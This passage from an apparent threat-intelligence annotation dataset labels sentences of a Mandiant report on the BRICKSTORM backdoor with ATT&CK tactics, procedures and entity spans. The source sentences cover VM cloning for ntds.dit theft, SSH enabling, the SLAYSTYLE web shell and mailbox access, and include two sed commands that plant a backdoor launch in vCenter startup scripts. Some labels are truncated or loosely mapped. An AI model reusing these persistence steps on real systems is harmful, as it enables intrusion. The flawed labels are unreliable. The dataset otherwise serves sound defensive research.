"sentence_id": 29, "context_before": "Many organizations use Active Directory authentication for vCenter, which means BRICKSTEAL could capture those credentials.", "sentence_text": "Often, users who log in to vCenter have a high level of privilege in the rest of the enterprise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s30-23ac40", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "Often, users who log in to vCenter have a high level of privilege in the rest of the enterprise.", "sentence_text": "Previously shared hardening guidance for vSphere includes steps that can mitigate the ability of BRICKSTEAL to capture usable credentials in this scenario, such as enforcement of multi-factor authentication (MFA).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s31-81bebc", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "Previously shared hardening guidance for vSphere includes steps that can mitigate the ability of BRICKSTEAL to capture usable credentials in this scenario, such as enforcement of multi-factor authentication (MFA).", "sentence_text": "This is a technique that other threat actors have used .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s32-6c090b", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "This is a technique that other threat actors have used .", "sentence_text": "With a clone of the virtual machine, the threat actor can mount the filesystem and extract files of interest, such as the Active Directory Domain Services database ( ntds.dit ).", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "The threat actor mounts the filesystem of a cloned virtual machine and extracts sensitive files such as the ntds.dit database.", "entities": [ { "text": "the threat actor", "start": 37, "end": 53, "label": "ThreatActor" }, { "text": "can mount the filesystem and extract files of interest, such as the Active Directory Domain Services database ( ntds.dit )", "start": 54, "end": 176, "label": "Action" }, { "text": "ntds.dit", "start": 166, "end": 174, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s33-bcdd61", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "With a clone of the virtual machine, the threat actor can mount the filesystem and extract files of interest, such as the Active Directory Domain Services database ( ntds.dit ).", "sentence_text": "Although these Windows Servers likely have security tools installed on them, the threat actor never powers on the clone so the tools are not executed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s36-994c47", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "TaskEvent]", "sentence_text": "[info] [VSPHERE.LOCAL\\Administrator] []", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s37-9de720", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "[info] [VSPHERE.LOCAL\\Administrator] []", "sentence_text": "[]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s38-f03635", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "[]", "sentence_text": "[Task: VirtualMachine.clone]\n2025-04-01 03:37:49 [vim.event.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s39-a5071f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "[Task: VirtualMachine.clone]\n2025-04-01 03:37:49 [vim.event.", "sentence_text": "VmBeingClonedEvent]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s40-4e8c35", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "VmBeingClonedEvent]", "sentence_text": "[info] [VSPHERE.LOCAL\\Administrator] []", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s41-23eb20", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "[info] [VSPHERE.LOCAL\\Administrator] []", "sentence_text": "[]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s42-b5a758", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "[]", "sentence_text": "[vim.event.VmClonedEvent]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s43-373679", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "[vim.event.VmClonedEvent]", "sentence_text": "[info] [VSPHERE.LOCAL\\Administrator] []", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s44-3f89a9", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "[info] [VSPHERE.LOCAL\\Administrator] []", "sentence_text": "[]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s45-c96b3b", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "[]", "sentence_text": "[vim.event.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s46-486d13", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "[vim.event.", "sentence_text": "TaskEvent]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s47-ffa179", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "TaskEvent]", "sentence_text": "[info] [VSPHERE.LOCAL\\Administrator] []", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s48-6beccb", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "[info] [VSPHERE.LOCAL\\Administrator] []", "sentence_text": "[]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s49-78eca2", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "[]", "sentence_text": "[Task: VirtualMachine.destroy]\n2025-04-01 04:05:47", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s50-c77898", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "[Task: VirtualMachine.destroy]\n2025-04-01 04:05:47", "sentence_text": "[vim.event.VmRemovedEvent]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s51-e9c597", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "[vim.event.VmRemovedEvent]", "sentence_text": "[info] [VSPHERE.LOCAL\\Administrator] []", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s52-dd825e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "[info] [VSPHERE.LOCAL\\Administrator] []", "sentence_text": "[]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s53-e0f23b", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "[]", "sentence_text": "[Removed DC01-Clone on esxi02 from <", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s54-1474c4", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "[Removed DC01-Clone on esxi02 from <", "sentence_text": "vCenter inventory object>]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s55-141985", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "vCenter inventory object>]", "sentence_text": "In one instance the threat actor used legitimate server administrator credentials to repeatedly move laterally to a system running Delinea (formerly Thycotic) Secret Server.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "The threat actor used legitimate administrator credentials to move laterally to a system running Secret Server.", "entities": [ { "text": "the threat actor", "start": 16, "end": 32, "label": "ThreatActor" }, { "text": "used legitimate server administrator credentials to repeatedly move laterally to a system running Delinea (formerly Thycotic) Secret Server", "start": 33, "end": 172, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s56-6c4958", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "In one instance the threat actor used legitimate server administrator credentials to repeatedly move laterally to a system running Delinea (formerly Thycotic) Secret Server.", "sentence_text": "Move Laterally\nTypically, at least one instance of BRICKSTORM would be the primary source of hands-on keyboard activity, with two or more compromised appliances serving as backups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s57-aed921", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "Move Laterally\nTypically, at least one instance of BRICKSTORM would be the primary source of hands-on keyboard activity, with two or more compromised appliances serving as backups.", "sentence_text": "In one instance the actor used credentials known to be stored in a password vault they previously accessed.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "use credentials from password vault", "entities": [ { "text": "used credentials", "start": 26, "end": 42, "label": "Action" }, { "text": "password vault", "start": 67, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s58-3e2be3", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "In one instance the actor used credentials known to be stored in a password vault they previously accessed.", "sentence_text": "In another instance they used credentials known to be stored in a PowerShell script the threat actor previously viewed.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "use credentials from script", "entities": [ { "text": "used credentials", "start": 25, "end": 41, "label": "Action" }, { "text": "PowerShell script", "start": 66, "end": 83, "label": "MalwareTool" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s59-10a24e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "In another instance they used credentials known to be stored in a PowerShell script the threat actor previously viewed.", "sentence_text": "In multiple cases the actor logged in to either the ESXi web-based UI or the vCenter Appliance Management Interface (VAMI) to enable the SSH service so they could connect and install BRICKSTORM.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "The actor logs into ESXi or vCenter interfaces, enables SSH access, and installs the BRICKSTORM backdoor.", "entities": [ { "text": "the actor", "start": 18, "end": 27, "label": "ThreatActor" }, { "text": "logged in to either the ESXi web-based UI or the vCenter Appliance Management Interface (VAMI) to enable the SSH service so they could connect and install BRICKSTORM", "start": 28, "end": 193, "label": "Action" }, { "text": "BRICKSTORM", "start": 183, "end": 193, "label": "MalwareTool" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s60-6f706f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "In multiple cases the actor logged in to either the ESXi web-based UI or the vCenter Appliance Management Interface (VAMI) to enable the SSH service so they could connect and install BRICKSTORM.", "sentence_text": "The following are example VAMI access events that show the threat actor connecting to VAMI and making changes to the SSH settings for vCenter.\n::ffff: :5480 -", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1133", "name": "External Remote Services" } ], "procedure": "Threat actor connects to VAMI and modifies SSH settings on vCenter to allow remote access", "entities": [ { "text": "threat actor", "start": 59, "end": 71, "label": "ThreatActor" }, { "text": "connecting to VAMI and making changes to the SSH settings ", "start": 72, "end": 130, "label": "Action" }, { "text": "vCenter.", "start": 134, "end": 142, "label": "Infrastructure_Indicator" }, { "text": "VAMI", "start": 86, "end": 90, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s61-5c335d", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "The following are example VAMI access events that show the threat actor connecting to VAMI and making changes to the SSH settings for vCenter.\n::ffff: :5480 -", "sentence_text": "ffff: :5480 -", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s62-e47e33", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "ffff: :5480 -", "sentence_text": "[] \"POST /rest/com/vmware/cis/session HTTP/1.1\" 200 60 \"https://10.0.0.255:5480/\" \"\" ::ffff: :5480 -", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s63-e68b8c", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "[] \"POST /rest/com/vmware/cis/session HTTP/1.1\" 200 60 \"https://10.0.0.255:5480/\" \"\" ::ffff: :5480 -", "sentence_text": "[] \"PUT /rest/appliance/access/ssh", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s64-9cf349", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "[] \"PUT /rest/appliance/access/ssh", "sentence_text": "In multiple cases, the actor used the sed command line utility to modify legitimate startup scripts to launch BRICKSTORM.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1037", "name": "Boot or Logon Initialization Scripts" } ], "procedure": "The actor uses the sed utility to modify startup scripts to execute the BRICKSTORM backdoor.", "entities": [ { "text": "the actor", "start": 19, "end": 28, "label": "ThreatActor" }, { "text": "used the sed command line utility to modify legitimate startup scripts to launch BRICKSTORM", "start": 29, "end": 120, "label": "Action" }, { "text": "BRICKSTORM", "start": 110, "end": 120, "label": "MalwareTool" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s65-e70f8d", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "In multiple cases, the actor used the sed command line utility to modify legitimate startup scripts to launch BRICKSTORM.", "sentence_text": "The following are a few example sed commands executed by the actor on vCenter.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s66-baa569", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "The following are a few example sed commands executed by the actor on vCenter.", "sentence_text": "sed -i s/export TEXTDOMAIN=vami-lighttp/export TEXTDOMAIN=vami-lighttp\\n\\/path/to/brickstorm/g /opt/vmware/etc/init.d/vami-lighttp sed -i $a\\SETCOLOR_WARNING=\"echo -en `/path/to/brickstorm`\\\\033[0;33m\" /etc/sysconfig/init The threat actor has also created a web shell tracked by Mandiant as SLAYSTYLE on vCenter servers.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Server Software Component: Web Shell" } ], "procedure": "create web shell on vCenter", "entities": [ { "text": "created a web shell", "start": 248, "end": 267, "label": "Action" }, { "text": "SLAYSTYLE", "start": 291, "end": 300, "label": "MalwareTool" }, { "text": "vCenter servers", "start": 304, "end": 319, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s67-16b58f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "sed -i s/export TEXTDOMAIN=vami-lighttp/export TEXTDOMAIN=vami-lighttp\\n\\/path/to/brickstorm/g /opt/vmware/etc/init.d/vami-lighttp sed -i $a\\SETCOLOR_WARNING=\"echo -en `/path/to/brickstorm`\\\\033[0;33m\" /etc/sysconfig/init The threat actor has also created a web shell tracked by Mandiant as SLAYSTYLE on vCenter servers.", "sentence_text": "It is designed to receive and execute arbitrary operating system commands passed through an HTTP request.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s68-176221", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "It is designed to receive and execute arbitrary operating system commands passed through an HTTP request.", "sentence_text": "The output from these commands is returned in the body of the HTTP response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s69-b467a9", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "The output from these commands is returned in the body of the HTTP response.", "sentence_text": "Complete Mission\nA common theme across investigations is the threat actor’s interest in the emails of key individuals within the victim organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s70-ea2d5c", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "Complete Mission\nA common theme across investigations is the threat actor’s interest in the emails of key individuals within the victim organization.", "sentence_text": "To access the email mailboxes of target accounts, the threat actor made use of Microsoft Entra ID Enterprise Applications with mail.read or full_access_as_app scopes.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1114", "name": "Email Collection" } ], "procedure": "access email mailboxes via Entra ID apps", "entities": [ { "text": "access the email mailboxes", "start": 3, "end": 29, "label": "Action" }, { "text": "Microsoft Entra ID Enterprise Applications", "start": 79, "end": 121, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s71-2acd66", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "To access the email mailboxes of target accounts, the threat actor made use of Microsoft Entra ID Enterprise Applications with mail.read or full_access_as_app scopes.", "sentence_text": "Both scopes allow the application to access mail in any mailbox.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s72-e35686", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "Both scopes allow the application to access mail in any mailbox.", "sentence_text": "When the threat actor exfiltrated files from the victim environment, they used the SOCKS proxy feature of BRICKSTORM to tunnel their workstation and directly access systems and web applications of interest.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Threat actor exfiltrated files from the victim environment using BRICKSTORM’s SOCKS proxy to tunnel access", "entities": [ { "text": "threat acto", "start": 9, "end": 20, "label": "ThreatActor" }, { "text": " exfiltrated files from the victim environmen", "start": 21, "end": 66, "label": "Action" }, { "text": " systems and web applications", "start": 164, "end": 193, "label": "Infrastructure_Indicator" }, { "text": "BRICKSTORM", "start": 106, "end": 116, "label": "MalwareTool" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s73-e7b05a", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "When the threat actor exfiltrated files from the victim environment, they used the SOCKS proxy feature of BRICKSTORM to tunnel their workstation and directly access systems and web applications of interest.", "sentence_text": "In multiple cases the threat actor used legitimate credentials to log in to the web interface for internal code stores and download repositories as ZIP archives.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Used legitimate credentials to access internal code repositories via web interface and download them as ZIP archives.", "entities": [ { "text": "threat actor", "start": 22, "end": 34, "label": "ThreatActor" }, { "text": "used legitimate credentials to log in to the web interface for internal code stores and download repositories", "start": 35, "end": 144, "label": "Action" }, { "text": "internal code stores and download repositories", "start": 98, "end": 144, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s74-b29c67", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "In multiple cases the threat actor used legitimate credentials to log in to the web interface for internal code stores and download repositories as ZIP archives.", "sentence_text": "In other cases the threat actor browsed to specific directories and files on remote machines by specifying Windows Universal Naming Convention (UNC) paths.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "The threat actor accessed remote systems using UNC paths to browse directories and files.", "entities": [ { "text": "the threat actor", "start": 15, "end": 31, "label": "ThreatActor" }, { "text": "browsed to specific directories and files on remote machines by specifying Windows Universal Naming Convention (UNC) paths", "start": 32, "end": 154, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s75-1b3bc9", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "In other cases the threat actor browsed to specific directories and files on remote machines by specifying Windows Universal Naming Convention (UNC) paths.", "sentence_text": "In several cases the BRICKSTORM samples deployed by the threat actor were removed from compromised systems.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "The threat actor removed BRICKSTORM samples from compromised systems to evade detection.", "entities": [ { "text": "the threat actor", "start": 52, "end": 68, "label": "ThreatActor" }, { "text": "were removed from compromised systems", "start": 69, "end": 106, "label": "Action" }, { "text": "BRICKSTORM", "start": 21, "end": 31, "label": "MalwareTool" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s76-e94ed7", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "In several cases the BRICKSTORM samples deployed by the threat actor were removed from compromised systems.", "sentence_text": "In these cases, the presence of BRICKSTORM was observed by conducting forensic analysis of backup images that identified the BRICKSTORM malware in place.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s77-cb5745", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "In these cases, the presence of BRICKSTORM was observed by conducting forensic analysis of backup images that identified the BRICKSTORM malware in place.", "sentence_text": "Hunting Guidance\nCreate or Update Asset Inventory Foundational to the success of any threat hunt is an asset inventory that includes devices not covered by the standard security tool stack, such as edge devices and other appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s78-7db96a", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "Hunting Guidance\nCreate or Update Asset Inventory Foundational to the success of any threat hunt is an asset inventory that includes devices not covered by the standard security tool stack, such as edge devices and other appliances.", "sentence_text": "Because these appliances lack support for traditional security tools an inventory is critical for developing effective compensating controls and detections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s79-66bbc7", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "Because these appliances lack support for traditional security tools an inventory is critical for developing effective compensating controls and detections.", "sentence_text": "Especially important is to track the management interface addresses of these appliances, as they act as the default gateway that malware and threat actor commands will egress out of.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s80-4318e1", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "Especially important is to track the management interface addresses of these appliances, as they act as the default gateway that malware and threat actor commands will egress out of.", "sentence_text": "Known unknowns:\nWork across teams to brainstorm appliance classes that may be more specialized to your organization, but the security organization likely lacks visibility into.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s81-123369", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "Known unknowns:\nWork across teams to brainstorm appliance classes that may be more specialized to your organization, but the security organization likely lacks visibility into.", "sentence_text": "Consider using network visibility tools or your existing EDR to scan for “live” IP addresses that do not show in your EDR reports.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s82-432c13", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "Consider using network visibility tools or your existing EDR to scan for “live” IP addresses that do not show in your EDR reports.", "sentence_text": "This has the added benefit of identifying unmanaged devices that should have EDR but don’t.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s83-80f99e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "This has the added benefit of identifying unmanaged devices that should have EDR but don’t.", "sentence_text": "File and Backup Scan for BRICKSTORM YARA rules have proven to be the most effective method for detecting BRICKSTORM binaries on appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s84-b27252", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "File and Backup Scan for BRICKSTORM YARA rules have proven to be the most effective method for detecting BRICKSTORM binaries on appliances.", "sentence_text": "We are sharing relevant YARA rules in the appendix section of this post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s85-c9d05f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "We are sharing relevant YARA rules in the appendix section of this post.", "sentence_text": "Yara can be difficult to run at scale, but some backup solutions provide the ability to run YARA across the backup data store.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s86-14993d", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "Yara can be difficult to run at scale, but some backup solutions provide the ability to run YARA across the backup data store.", "sentence_text": "Internet Traffic from Edge Devices and Appliances Use the inventory of appliance management IP addresses to hunt for evidence of malware beaconing in network logs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s87-a048a9", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "Internet Traffic from Edge Devices and Appliances Use the inventory of appliance management IP addresses to hunt for evidence of malware beaconing in network logs.", "sentence_text": "In general, appliances should not communicate with the public Internet from management IP addresses except to download updates and send crash analytics to the manufacturer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s88-baf7b0", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "In general, appliances should not communicate with the public Internet from management IP addresses except to download updates and send crash analytics to the manufacturer.", "sentence_text": "Established outbound traffic to domains or IP addresses not controlled by the appliance manufacturer should be regarded as very suspicious and warranting forensic review of the appliance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s89-3cfe62", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "Established outbound traffic to domains or IP addresses not controlled by the appliance manufacturer should be regarded as very suspicious and warranting forensic review of the appliance.", "sentence_text": "BRICKSTORM can use DNS over HTTP (DoH), which should be similarly rare when sourced from appliance management IP addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s90-98f78e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "BRICKSTORM can use DNS over HTTP (DoH), which should be similarly rare when sourced from appliance management IP addresses.", "sentence_text": "Access to Windows Systems from Appliances The threat actor primarily accessed Windows machines (both desktops and servers) using type 3 (network) logins, although in some cases the actor also established RDP sessions.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "The threat actor accessed Windows systems using network logins and established RDP sessions for remote access.", "entities": [ { "text": "The threat actor", "start": 42, "end": 58, "label": "ThreatActor" }, { "text": "accessed Windows machines (both desktops and servers) using type 3 (network) logins, although in some cases the actor also established RDP sessions", "start": 69, "end": 216, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s91-e67f4a", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "Access to Windows Systems from Appliances The threat actor primarily accessed Windows machines (both desktops and servers) using type 3 (network) logins, although in some cases the actor also established RDP sessions.", "sentence_text": "Appliances should rarely log in to Windows desktops or servers and any connections should be treated as suspicious.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s92-f1e7fd", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "Appliances should rarely log in to Windows desktops or 